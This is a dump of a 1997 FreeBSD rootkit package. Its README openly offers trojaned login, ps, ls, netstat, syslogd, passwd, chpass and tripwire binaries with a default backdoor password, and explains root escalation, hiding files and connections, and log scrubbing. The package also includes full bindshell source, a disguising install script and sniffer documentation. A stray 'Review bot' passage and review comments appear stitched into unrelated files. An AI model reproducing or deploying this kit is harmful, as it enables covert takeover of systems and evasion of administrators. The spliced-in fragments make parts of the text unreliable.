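		 * Free each result only after the yp_match() that produced it
		 * succeeded.  The previous unconditional free(result) after
		 * both lookups released an uninitialized pointer when the
		 * first lookup failed, and released the first buffer a second
		 * time when only the second lookup failed.
		 */

		/* Is the user in the NIS passwd map */
		if (!yp_match(domain, "passwd.byname", user, strlen(user),
		    &result, &resultlen)) {
			user_yp = 1;
			copy_yp_pass(result, 0, resultlen);
			free(result);
			result = NULL;
		}
		/* Is the user in the NIS master.passwd map */
		if (user_yp && !yp_match(domain, "master.passwd.byname",
		    user, strlen(user), &result, &resultlen)) {
			copy_yp_pass(result, 1, resultlen);
			free(result);
			result = NULL;
		}
	}

	/* Is the user in the local password database */
	bf[0] = _PW_KEYBYNAME;
	/*
	 * Bound the key to the bytes actually copied into bf: with
	 * key.size = strlen(user) + 1, a name longer than UT_NAMESIZE made
	 * the lookup read past the end of bf.
	 */
	namelen = MIN(strlen(user), UT_NAMESIZE);
	bcopy((char *)user, bf + 1, namelen);
	key.data = (u_char *)bf;
	key.size = namelen + 1;
	if (!(dbp->get)(dbp,&key,&data,0)) {
		user_local = 1;
		copy_local_pass(data.data, data.size);
	}

	(dbp->close)(dbp);

	if (user_local && user_yp && user_exists)
		return(USER_YP_AND_LOCAL);
	else if (!user_local && user_yp && user_exists)
		return(USER_YP_ONLY);
	else if (user_local && !user_yp && user_exists)
		return(USER_LOCAL_ONLY);
	else if (!user_exists)
		return(USER_UNKNOWN);

	return(-1);
}

/*
 * Find the name of the NIS master server for this domain
 * and make sure it's running yppasswdd.
 *
 * Returns the server name that yp_master() stored in 'mastername'.
 * Every failure is reported with warnx() and then pw_error(NULL, 0, 1);
 * the code after each call assumes pw_error() does not return.
 *
 * NOTE(review): the reserved-port comparison is the only check made on
 * the server here, and the port number is whatever getrpcport() reports
 * for that host.  yp_submit() sends the user's typed password to the
 * host named by the return value.
 */
static char *get_yp_master(void)
{
	char *domain, *mastername;
	int rval;

	/* Get default NIS domain. */
	if ((rval = yp_get_default_domain(&domain))) {
		warnx("can't get local NIS domain name: %s",yperr_string(rval));
		pw_error(NULL, 0, 1);
	}

	/* Get master server of passwd map. */
	if ((rval = yp_master(domain, "passwd.byname", &mastername))) {
		warnx("can't get master NIS server: %s", yperr_string(rval));
		pw_error(NULL, 0, 1);
	}

	/* Check if yppasswdd is out there. */
	if ((rval = getrpcport(mastername, YPPASSWDPROG, YPPASSWDPROC_UPDATE,
	    IPPROTO_UDP)) == 0) {
		warnx("yppasswdd not running on NIS master server");
		pw_error(NULL, 0, 1);
	}

	/*
	 * Make sure it's on a reserved port.
	 * XXX Might break with yppasswdd servers running on Solaris 2.x.
	 */
	if (rval >= IPPORT_RESERVED) {
		warnx("yppasswdd server not running on reserved port");
		pw_error(NULL, 0, 1);
	}

	/* Everything checks out: return the name of the server. */
	return (mastername);
}

/* * Ask the user for his NIS password and submit the new information * to yppasswdd. Note that yppasswdd requires password authentication * and only allows changes to existing records rather than the addition * of new records. (To do actual updates we would need something like * secure RPC and ypupdated, which FreeBSD doesn't have yet.) This means * that the superuser cannot use chpass(1) to add new users records to * the NIS password database.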
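*/
/*
 * 'pw' supplies the new field values for the record.  When pw->pw_passwd
 * is non-empty the user is prompted for the current password, which is
 * checked locally with crypt() and then passed to yppasswdd as 'oldpass'.
 * Failures are reported with warnx() followed by pw_error(NULL, 0, 1);
 * the code after each call assumes pw_error() does not return.
 */
void
yp_submit(pw)
	struct passwd *pw;
{
	struct yppasswd yppasswd;
	CLIENT *clnt;
	char *master, *password, *encpass, *computed;
	int rval, status = 0;
	struct timeval tv;

	/* Populate the yppasswd structure that gets handed to yppasswdd. */
	/*
	 * XXX This is done first to work around what looks like a very
	 * strange memory corruption bug: the text fields pointed to
	 * by the members of the 'pw' structure appear to be clobbered
	 * after get_yp_master() returns (in particular, it happens
	 * during getrpcport()). I don't know exactly where the problem
	 * lies: I traced it all the way to gethostbyname(), then gave
	 * up.
	 */
	yppasswd.newpw.pw_passwd = strdup(pw->pw_passwd);
	yppasswd.newpw.pw_name = strdup(pw->pw_name);
	yppasswd.newpw.pw_uid = pw->pw_uid;
	yppasswd.newpw.pw_gid = pw->pw_gid;
	yppasswd.newpw.pw_gecos = strdup(pw->pw_gecos);
	yppasswd.newpw.pw_dir = strdup(pw->pw_dir);
	yppasswd.newpw.pw_shell = strdup(pw->pw_shell);
	yppasswd.oldpass = "";

	/* strdup() signals allocation failure with NULL; don't pass that on. */
	if (yppasswd.newpw.pw_passwd == NULL ||
	    yppasswd.newpw.pw_name == NULL ||
	    yppasswd.newpw.pw_gecos == NULL ||
	    yppasswd.newpw.pw_dir == NULL ||
	    yppasswd.newpw.pw_shell == NULL) {
		warnx("out of memory");
		pw_error(NULL, 0, 1);
	}

	/* Get NIS master server name */
	master = get_yp_master();

	if (pw->pw_passwd[0]) {
		/* Get the user's password for authentication purposes. */
		printf ("Changing NIS information for %s on %s\n",
		    yppasswd.newpw.pw_name, master);
		encpass = pw->pw_passwd;
		password = getpass("Please enter password: ");
		/* Treat a failed prompt or a failed crypt() as a mismatch. */
		computed = (password != NULL) ? crypt(password, encpass) : NULL;
		if (computed == NULL ||
		    strncmp(computed, encpass, strlen(encpass))) {
			warnx("Password incorrect.");
			pw_error(NULL, 0, 1);
		}
		/*
		 * The typed password itself becomes part of the request that
		 * xdr_yppasswd encodes below; no encryption is applied in this
		 * function.
		 */
		yppasswd.oldpass = password;	/* XXX */
	}

	/* Create a handle to yppasswdd. */
	clnt = clnt_create(master, YPPASSWDPROG, YPPASSWDVERS, "udp");
	if (clnt == NULL) {
		/* Previously dereferenced unconditionally on the next line. */
		warnx("can't create RPC client for yppasswdd on %s", master);
		pw_error(NULL, 0, 1);
	}
	clnt->cl_auth = authunix_create_default();

	/* Set a timeout and make the RPC call. */
	tv.tv_sec = 20;
	tv.tv_usec = 0;
	rval = clnt_call(clnt, YPPASSWDPROC_UPDATE, xdr_yppasswd,
	    (char *)&yppasswd, xdr_int, (char *)&status, &tv);

	/* Call failed: signal the error. */
	if (rval) {
		warnx("NIS update failed: %s", clnt_sperrno(rval));
		pw_error(NULL, 0, 1);
	}

	/* Success. */
	auth_destroy(clnt->cl_auth);
	clnt_destroy(clnt);

	/* Release the copies made at the top of the function. */
	free(yppasswd.newpw.pw_passwd);
	free(yppasswd.newpw.pw_name);
	free(yppasswd.newpw.pw_gecos);
	free(yppasswd.newpw.pw_dir);
	free(yppasswd.newpw.pw_shell);

	/* status is the int decoded from the reply; non-zero prints "not changed". */
	warnx("NIS information %schanged on host %s",
	    status ? "not " : "", master);
	return;
}
#endif /* YP */
fbsdrootkit-1.2/chpass/Makefile.dist100600 764 764 1461 6257153127 15030 0ustar dfdf# @(#)Makefile 8.2 (Berkeley) 4/2/94 PROG= chpass SRCS= chpass.c edit.c field.c pw_copy.c pw_scan.c pw_util.c table.c util.c BINOWN= root BINMODE=4555 .PATH: ${.CURDIR}/../../usr.sbin/pwd_mkdb ${.CURDIR}/../../usr.sbin/vipw CFLAGS+=-I${.CURDIR}/../../usr.sbin/pwd_mkdb -I${.CURDIR}/../../usr.sbin/vipw LINKS= ${BINDIR}/chpass ${BINDIR}/chfn LINKS+= ${BINDIR}/chpass ${BINDIR}/chsh LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchpass LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchfn LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchsh MLINKS= chpass.1 chfn.1 chpass.1 chsh.1 COPTS+= -DYP SRCS+= pw_yp.c DPADD= ${LIBRPCSVC} ${LIBCRYPT} LDADD+= -lrpcsvc -lcrypt beforeinstall: [ ! -e ${DESTDIR}${BINDIR}/chpass ] || \ chflags noschg ${DESTDIR}${BINDIR}/chpass afterinstall: chflags schg ${DESTDIR}${BINDIR}/chpass .include fbsdrootkit-1.2/rootkitutil.h100600 764 764 407 6265031433 13660 0ustar dfdf#define ERR(a) {\ fprintf(stderr,"%s: ",pg);\ perror(a);\ exit(1);\ } #define BASENAME(a) {\ if((pg=(char *)strrchr(a,'/'))) {\ pg++;\ }\ else {\ pg=a;\ }\ } #define USAGE(a) {\ fprintf(stderr,"Usage: %s %s\n",pg,a);\ exit(1);\ } char *pg; #define RK_PROG pg fbsdrootkit-1.2/netiso/ 40700 764 764 0 6257642701 12346 5ustar dfdffbsdrootkit-1.2/netiso/tp_astring.c100600 764 764 5100 5617440453 14756 0ustar dfdf/*- * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2.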
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * @(#)tp_astring.c 8.1 (Berkeley) 6/10/93 * $Id: tp_astring.c,v 1.2 1994/08/02 07:50:51 davidg Exp $ */ char *tp_sstring[] = { "ST_ERROR(0x0)", "TP_CLOSED(0x1)", "TP_CRSENT(0x2)", "TP_AKWAIT(0x3)", "TP_OPEN(0x4)", "TP_CLOSING(0x5)", "TP_REFWAIT(0x6)", "TP_LISTENING(0x7)", "TP_CONFIRMING(0x8)", }; char *tp_estring[] = { "TM_inact(0x0)", "TM_retrans(0x1)", "TM_sendack(0x2)", "TM_notused(0x3)", "TM_reference(0x4)", "TM_data_retrans(0x5)", "ER_TPDU(0x6)", "CR_TPDU(0x7)", "DR_TPDU(0x8)", "DC_TPDU(0x9)", "CC_TPDU(0xa)", "AK_TPDU(0xb)", "DT_TPDU(0xc)", "XPD_TPDU(0xd)", "XAK_TPDU(0xe)", "T_CONN_req(0xf)", "T_DISC_req(0x10)", "T_LISTEN_req(0x11)", "T_DATA_req(0x12)", "T_XPD_req(0x13)", "T_USR_rcvd(0x14)", "T_USR_Xrcvd(0x15)", "T_DETACH(0x16)", "T_NETRESET(0x17)", "T_ACPT_req(0x18)", }; fbsdrootkit-1.2/README100600 764 764 14147 6273500240 12040 0ustar dfdfThe _____ ____ ____ ____ | ___| __ ___ ___| __ ) ___|| _ \ | |_ | '__/ _ \/ _ \ _ \___ \| | | | | _|| | | __/ __/ |_) |__) | |_| | |_| |_| \___|\___|____/____/|____/ rootkit 1.2 (1/27/97) by Method NOTE: This package was heavily influenced by the existing Linux rootkit, which in turn was adapted from the SunOS rootkit, etc., etc. UPDATES: 1.0.1 - Fixed some broken Makefile stuff. Made it so inetd does the right thing on a SIGHUP. Added some extra security to the shell trojans. 1.1 - Added tripwire trojan. Cleaned up some other stuff. 1.2 - Put a password on inetd (Thanks for the suggestion Whoot :) This package includes the following: chpass Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access ls Trojaned! Hide files du Trojaned! Hide files ifconfig Trojaned! Hide sniffing netstat Trojaned! Hide connections passwd Trojaned! User->r00t ps Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs sniffit A kewl sniffz0r! fix File fixer! addlen File length fixer(!) zapbsd2 An improved utmp/wtmp/lastlog type zapper bindshell port/shell type daemon! tripwire Trojaned! 
Hide changes INSTALLATION: To install this kit execute the command 'make all install' from the # prompt. All of the file/password configurations are in config.h so feel free to modify things to suit your particular fancy. Everything here has been tested on a FreeBSD-stable distribution. See the note at the end about what to do if the admin uses tripwire. Also make sure to read the Makefile and scripts so you know what's going on. USAGE: OK I will go through how to use each program one by one. NOTE when I say password I mean the rootkit password not your users password (d0h!). By default the rootkit password is "h0tb0x". chpass - Local user->root. Run ch{sh,fn,pass} then when it asks you for a new name enter your password. inetd - Binds a shell to a port for remote access. Adds a shell exec service on the ingreslock port, type in the rootkit password to start a shell. login - Allows login to any account with the rootkit password. If root login is refused on your terminal login as "r00t". History logging is disabled if you login using your password. ls - Trojaned to hide specified files and directories. The default data file is /dev/ptyr. All files can be listed with 'ls -/'. The format of /dev/ptyr is: ptyr fbsdrootkit-1.0 pr0n Use partial filenames. This would hide any files/directories with the names ptyr, fbsdrootkit-1.0 and pr0n. du - (see ls) ifconfig - Modified to remove PROMISC flag on the ethernet device. netstat - Modified to remove tcp/udp/sockets from or to specified addresses, paths and ports. 
default data file: /dev/ptyq command 1: hide local address command 2: hide remote address command 3: hide local port command 4: hide remote port command 5: hide UNIX socket path example: 1 128.31 <- Hides all local connections from 128.31.X.X 2 128.31.39.20 <- Hides all remote connections to 128.31.39.20 3 8000 <- Hides all local connections from port 8000 4 6667 <- Hides all remote connections to port 6667 5 .term/socket <- Hides all UNIX sockets including the path .term/socket passwd - Local user->root. Enter your rootkit password instead of your old password. ps - Modified to remove specified processes. Default data file is /dev/ptyp. An example data file is as follows: 0 0 Strips all processes running under root 1 p0 Strips tty p0 2 sniffer Strips all programs with the name sniffer Don't put in the comments, obviously. rshd - Execute remote commands as root. Usage: rsh -l rootkitpassword host command i.e. rsh -l h0tb0x 0wn3d.escape.com /bin/sh -i would start a root shell. syslogd - Modified to remove specified strings from logging. I thought of this one when I was on a system which logged every connection.. I kept getting pissed off with editing files every time I connected to remove my hostname. Then I thought 'Hey dude, why not trojan syslogd?!' and the rest is history. :) Default data file is /dev/ptys Example data file: evil.com 123.100.101.202 rshd This would remove all logs containing the strings evil.com, 123.100.101.202 and rshd. Smart! :)) sniffit - An advanced network sniffer. This is pretty kewl and has lots of filtering options and other stuff. Useful for targetting a single host or net. Sniffit uses ncurses. bindshell - This is pretty self-explanatory. Basically it binds a shell to a port, 31337 by default. Read the source on this one. fix - Replaces and fixes timestamp/checksum infomation on files. I modified this a bit for my own uses and to fix a nasty bug when replacing syslogd and inetd. 
The replacement file will be erased by fix (unlike other versions). addlen - This quickie modifies the length of files by adding harmless zeros to the end. Wonder why nobody ever thought of doing this before. Inspired by a stupid security tool which checks lengths of setuid files. zapbsd2 - This improved version of zapbsd writes over entries with ones instead of zeros. I added some capabilities and error checking so I raised the number. TRIPWIRE: I have done a major improvement of this part. Simply make tripwire and the script will ask you a few questions and take action depending on your responses. If both the database file and tripwire binary are read-only then there is nothing you can do. SOURCES: Some of these patches are derived from the original SunOS rootkit. ls, du, ps, netstat and chpass were done by yours truly. Anything else came from the Linux rootkit with a few modifications. The idea for tripwire was my own. OTHER: I welcome all comments and questions at method@yikes.com. All complaints and flames will be sent to /dev/null. Thanks to OGhost and Phelix for beta testing and advice. In closing, this kit can only take you so far. Although it covers almost everything, a competent sysadmin will eventually catch on. Remember, never let your guard down. -M fbsdrootkit-1.2/bindshell.c100600 764 764 2711 6266260424 13253 0ustar dfdf/* quick thingy... bind a shell to a socket... defaults to port 31337 */ /* code by pluvius@****** (address removed to protect the innocent :) */ /* don't forget.. when you connect to the port.. 
commands are like: */ /* "ls -l;" or "exit;" (don't forget the ';') */ /* cleaned up for the FreeBSD rootkit */ #include #include #include #include #include #include "rootkitutil.h" #define PORT 31337 main(int argc, char **argv) { int soc_des,soc_cli,soc_rc,soc_len,server_pid,cli_pid; struct sockaddr_in serv_addr,client_addr; BASENAME(argv[0]) if((soc_des=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0) ERR("socket") memset(&serv_addr,0x00,sizeof(serv_addr)); serv_addr.sin_family=AF_INET; serv_addr.sin_addr.s_addr=htonl(INADDR_ANY); serv_addr.sin_port=htons(PORT); if((soc_rc=bind(soc_des,(struct sockaddr *)&serv_addr,sizeof(serv_addr)))<0) ERR("bind") if(fork()!=0) exit(0); setpgrp(); signal(SIGHUP, SIG_IGN); if(fork()!=0) exit(0); if((soc_rc=listen(soc_des, 5))!=0) ERR("listen") for(;;) { soc_len=sizeof(client_addr); if((soc_cli=accept(soc_des, (struct sockaddr *)&client_addr, &soc_len))<0) ERR("accept") cli_pid=getpid(); server_pid=fork(); if(server_pid!=0) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2); execl("/bin/sh","sh","-i",0); close(soc_cli); exit(0); } close(soc_cli); } } fbsdrootkit-1.2/install.sh100700 764 764 575 6265031277 13135 0ustar dfdf#!/bin/sh # Installation script for the FreeBSD rootkit. Make as many changes as you like. # Uncomment the below line if you want to backup the files. #BAKDIR=bak for BIN; do PROG=`basename $BIN` echo -n "Installing $PROG. . ." RKBIN=$PROG/$PROG if [ -x $BIN ]; then addlen $RKBIN $BIN fix $BIN $RKBIN $BAKDIR fi echo "done." done echo "The installation is complete." fbsdrootkit-1.2/sniffit.0.3.3/ 40700 764 764 0 6226213211 13131 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/IMPORTANT100600 764 764 2403 6226213207 14534 0ustar dfdf#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# * Sniffit V.0.3.3 * #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# Here are some remarks that could be important for some ppl. 
It gives extra info on various systems and fixes needed on some systems. The files referred to in here can be found in the 'Misc' directory. Most of those things are contributed by other ppl, so I don't take resposability for this. 1) configure: libpcap/configure script for bash/zsh type of shells. Contributed by Qing Long 2) ncurses: When having problems with ncurses during Sniffit compilation, please check the paths, and add some symbolic links. ncurses installations tend to differ. 3) FREEBSD: You should apply the FreeBSD_patch as follwing 'patch ../libpcap/pcap.c # unset bison unset ethers unset flex unset gcc unset gcc1 unset pcap unset ranlib unset brokenmake if [ -e /dev/bpf0 ] then pcap=bpf else if [ -f /usr/include/net/pfilt.h ] then pcap=pf else if [ -e /dev/enet ] then pcap=enet else if [ -e /dev/nit ] then pcap=snit else if [ -f /usr/include/sys/net/nit.h ] then pcap=nit else if [ -f /usr/include/net/raw.h ] then pcap=snoop # must test for snoop before dlpi due to IRIX else if [ -f /usr/include/sys/dlpi.h ] then pcap=dlpi else if [ -f /usr/include/linux/types.h ] then pcap=linux else echo "configure: cannot determine packet capture interface" exit 1 fi fi fi fi fi fi fi fi # echo "configure: using $pcap packet capture interface" # if [ -x /bin/uname \ -o -x /usr/bin/uname \ ] then name=$(uname -s | tr '[A-Z]' '[a-z]') vers=$(uname -r | sed -e 's/\..*//' -e 's/T1/v1/' | tr '[A-Z]' '[a-z]') if [ "$name$vers" = "sunos5" ] then PATH="$PATH:/usr/ccs/bin" fi else if [ -x /bin/arch ] then # sun3 only supported machine without uname if [ "$(/bin/arch)" = "sun3" ] then name=sunos vers=3 fi fi fi # if [ "$name" = "bsd/386" \ -o "$name" = "bsd/os" \ ] then os=bsd else os="$name$vers" fi # if [ -x /usr/local/bin/flex \ -o -x /usr/local/flex \ -o -x /usr/bin/flex \ -o -x /bin/flex \ ] then # The -V flag was added in 2.4 if flex -V &> /dev/null then flex='-e s/^#have-flex#//' echo "configure: found flex executable" else s="version 2.4 or higher required" echo 
"configure: ignoring obsolete flex executable ($s)" fi else echo "configure: couldn't find flex executable; using lex" fi # if [ -x /usr/local/bin/bison \ -o -x /usr/local/bison \ -o -x /usr/bin/bison \ -o -x /bin/bison \ ] then bison='-e s/^#have-bison#//' echo "configure: found bison executable" else echo "configure: couldn't find bison executable; using yacc" fi # if [ -z "$flex" -a -n "$bison" ] || [ -n "$flex" -a -z "$bison" ] then s="reverting to lex/yacc" echo "configure: don't have both flex and bison; $s" unset flex unset bison fi # unset libc # for f in /usr/lib/libc.a /lib/libc.a /usr/lib/libc_s.a ; do if [ -f $f ] then libc=$f break fi done # if [ "$f" = "" ] then echo "configure: couldn't find libc" else if $libc 2>&1 | grep ether_ntoa > /dev/null then ethers='-e s/^#have-ethers#//' echo "configure: found support for /etc/ethers" fi fi # if [ -x /usr/local/bin/gcc \ -o -x /usr/local/gcc \ -o -x /usr/bin/gcc \ -o -x /bin/gcc \ ] then gcc='-e s/^#have-gcc#//' ver=$(gcc -v 2>&1 | sed -n -e '$s/.* //' -e '$s/\..*//p') if [ "$ver" = 1 ] then gcc1='-e s/^#have-gcc1#//' fi fi # if [ -x /usr/bin/ranlib ] then ranlib='-e s/^#have-ranlib#//' fi # if [ "$os" = "ultrix4" \ -o "$os" = "sunos3" \ ] then brokenmake='-e s/^#have-broken-make#//' fi # rm -f stdlib.h Makefile # if ! [ -f /usr/include/stdlib.h ] then ln -s /dev/null stdlib.h fi # sed -e "s/^#have-$pcap#//" \ -e "s/^#have-$os#//" \ $flex \ $bison \ $gcc \ $gcc1 \ $ranlib \ $ethers \ $brokenmake \ Makefile.in > Makefile # mflags="" # if [ "$gcc" != "" ] then mflags="CC=gcc" rm -f checkioctl make checkioctl ./checkioctl if ! ./checkioctl then rm checkioctl echo "configure: bailing..." rm Makefile exit 1 else rm checkioctl fi fi # chmod ug+w Makefile make depend $mflags exit 0 # fbsdrootkit-1.2/sniffit.0.3.3/Misc/FreeBSD_patch100600 764 764 1212 6226213207 16440 0ustar dfdf*** libpcap/pcap.c Fri Feb 16 04:09:21 1996 *************** *** 156,167 **** char * pcap_strerror(int errnum) { ! extern int sys_nerr; ! 
extern char *sys_errlist[]; static char ebuf[20]; ! if ((unsigned int)errnum < sys_nerr) ! return (sys_errlist[errnum]); (void)sprintf(ebuf, "Unknown error: %d", errnum); return(ebuf); } --- 156,167 ---- char * pcap_strerror(int errnum) { ! /* extern int sys_nerr; ! extern char *sys_errlist[]; */ static char ebuf[20]; ! /* if ((unsigned int)errnum < sys_nerr) ! return (sys_errlist[errnum]); */ (void)sprintf(ebuf, "Unknown error: %d", errnum); return(ebuf); } fbsdrootkit-1.2/sniffit.0.3.3/README.FIRST100600 764 764 62402 6226213207 15027 0ustar dfdf#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# * Sniffit V.0.3.3 * * By Brecht Claerhout * # This program is intended to demonstrate the unsafeness of TCP (currently) # * No illegal activities are encouraged! * # Anyway, I'm not responsible for anything you do with it. # * * # Sniffit grew a little upon it's original intentions and is now # * extended for network debugging (UDP, ICMP, netload, etc.) * #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# * Libpcap library * # This product includes software developed by the Computer Systems # * Engineering Group at Lawrence Berkeley Laboratory. * #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# 0. Introduction, and some stuff you should know. crap, credits and compilation notes 1. Programmers notes excuses for my incompetence 2. Use of the program flags and examples 3. Extra info on use 3.1 Running interactive mode 3.2 Forcing network devices (*READ*) 3.3 Format of the config file 3.4 Loglevels 4. The output 4.1 Normal 4.2 Logfile 5. IMPORTANT NOTES, READ! this also! 6. BUGFIXES 7. NEW STUFF to keep track of what's in it ------------------------------------------------------------------------------ 0. Introduction, and some stuff you should know. ------------------------------------------------ 0.3.3... A full package, no patch. 
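Review bot: With the sys_errlist lookup commented out on the new side of the FreeBSD_patch hunk, every call to pcap_strerror now reaches `(void)sprintf(ebuf, "Unknown error: %d", errnum);`, and `static char ebuf[20]` is too small for it: the 15-character prefix plus up to 11 characters for a 32-bit int and the terminator needs 27 bytes, so a large or negative errnum is written past the end of the buffer. The change also discards the message text for every valid errno. I would replace the disabled lookup with `return (strerror(errnum));` (declared in string.h), or at least bound the fallback with `static char ebuf[32];` and `(void)snprintf(ebuf, sizeof(ebuf), "Unknown error: %d", errnum);`.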
Because 0.3.2 was kind of getting a mess (you know a bug in one of the functions). I cleaned it out, and saw that the patch was huge, so I could beter restart. (I've reformatted, rewritten and cleaned out some parts). What did I do? Besides cleaning up, I worked in the interactive part. I've been neglecting it lately... and it's one of the parts people like my program for, and to be honest I re-discovered it when in need of a interactive sniffer. No more lockups, no more weird behaviour... I recoded some parts, tested it thoroughly. The interface adjusts to your screensize, what makes it very usefull when working on an 21" X-term (minimum dimensions of a window should be 80x18 chars). I also added a nice feature for adding programs to the sniffit package (see discussion of interactive part below) I use the libpcap library developped at Berkeley Laboratory, for easy porting (Read the licence). Credits go to: Wim Vandeputte, best friend and UNIX guru, for support, testing and providing me with a WWW site. Godmar Back, for fixing that kernel 1.2.X bug (Sniffit 0.1.X). Peter Kooiman, of Paradigm Systems Technology for providing the facilities to port Sniffit, and for the endless testing (although he laughs this away with "no big deal, I don't need no credits"). Without him, there would have been no ports at all. Brooke Paul, for providing me with an SGI account. Qing Long, for the bash/zsh libpcap/configure script. Guy Gustavson, for giving me a FreeBSD account. Woju (woju@freebsd.ee.ntu.edu.tw), for the ncurses SunOS/FreeBSD fixing, and for his other effords. Brian Beaulieu, for making a U.S. mirror site available! (see below for URL) everybody, who ever mailed me with sugestions help, etc... This is free software, spread it if you want, but keep the package complete and unmodified. Do not use any code from this package without mentioning the source in your docs and advertisement. Do not use any of this code in Commercial Software/Commercial Packages. 
Suggestions and comments can be sent to: coder@reptile.rug.ac.be Brecht Claerhout Meulebeeksestw. 51 8700 Tielt Belgium
The original distribution program can be obtained from (my site): http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
U.S. mirror site (thank you Brian!): http://despair.capecod.net/sniffit/sniffit.html
MIND YOU: this program is run as root, and thus could easily contain dangerous trojans. If you get it from the above site you can safely compile and use it. (no trojan versions have been discovered yet.. it's just a warning)
Compiling: Look at the "config.h" file for options. PLEASE CHECK THAT CONFIG FILE!!! Type "make" followed by the name of your system to compile, where the system is one of: linux sunos irix freebsd (sunos: SunOS/Solaris) (freebsd: PLEASE APPLY THE PATCH FIRST, READ IMPORTANT!!!)
Other stuff....
make clean : cleans all directories for compiling from scratch
make sniffit_manual: look at the end of the makefile, this part is easily modified manually. If the program doesn't compile and you want to add some compiling options
1. Programmers notes
--------------------
No more excuses ..... I think I used the easiest solution, probably somewhere some guru is now laughing at my lack of programming skill, but the hell with it, it works (most of the time, here.... ;) Still I note the use of shared memory, with Linux you should take extra care when recompiling your kernel! Answer YES to 'System V IPC (CONFIG_SYSVIPC) [y]'.
2. Use of the program
---------------------
(The man pages have detailed info on what parameters you can mix)
Options: ONE of these is required!
-v Show version and exit (just added because it's such a widespread option)
-t tells the sniffer to check out packets GOING TO the host given as its argument
-s tells the sniffer to check out packets COMING FROM the host given as its argument
You can now use the 'x' wildcard (only IP NUMBERS of course). e.g. -t 199.145.x -t 199.14x mind you -t x is not a valid option.
-i Interactive mode, overrides all other options -c Use as a config file for Sniffit See 3.3 for format of the config file. NOTE: -t or -s only apply to TCP packages, ICMP, IP, UDP packages are ALL interpreted. Also, any selection on ports, -p only applies to TCP packages. Parameters for all modes: -F force sniffit to use a network device (READ 3.2 ON THIS SUBJECT, IMPORTANT) -n Turn of IP checksum checking. This can show you bogus packets. (mind you ARP, RARP, other non-IP packets will show up bogus too) (compatible with ALL options) Parameters for not running in -i: -b does both -t and -s, doesn't mather what function you used (-t or -s) -d Dump mode, shows the packets on the screen in bytes (not like tcpdump). For test purposes. (numbers are hex) -a same of '-d' but outputs ASCII. -x Prints extended info on TCP packets (SEQ numbers, ACK, Flags) Like SEQ, ACK, the flags, etc... (works wit '-a', '-d', '-s', '-t', '-b' or on its own.) (Mind you it is always shown on stdout, so not logged when using '-t', '-s', '-b' without another parameter) -A When in logging mode, all non-printable chars will be replaced by . (see note below 4.The output) -P protocol specify the protocols examined (default TCP) possible options currently are: IP, TCP, ICMP, UDP They can be combined. -p Logs connections on port , 0 means all ports, default is 0 (all), look out with that on loaded nets! -l Ammount of information to log (default 300 bytes). Length 0 logs everything. (look out with diskspace when logging everything!) Parameters with -i: -D All logging output will be send to that device. It's cool to get the same IRC screen as the guy y'r sniffing upon ;-) Parameters with -c: -L enable logging with as loglevel currenly the following loglevels are supported: 1 : Raw level 10,12 : Normal level (see '2. The Output' for more info) Some examples: Imagine the following setup: 2 hosts on a subnet, one is running the sniffer (sniffit.com), the otherone is 666.666.666.7 (target.com). 1. 
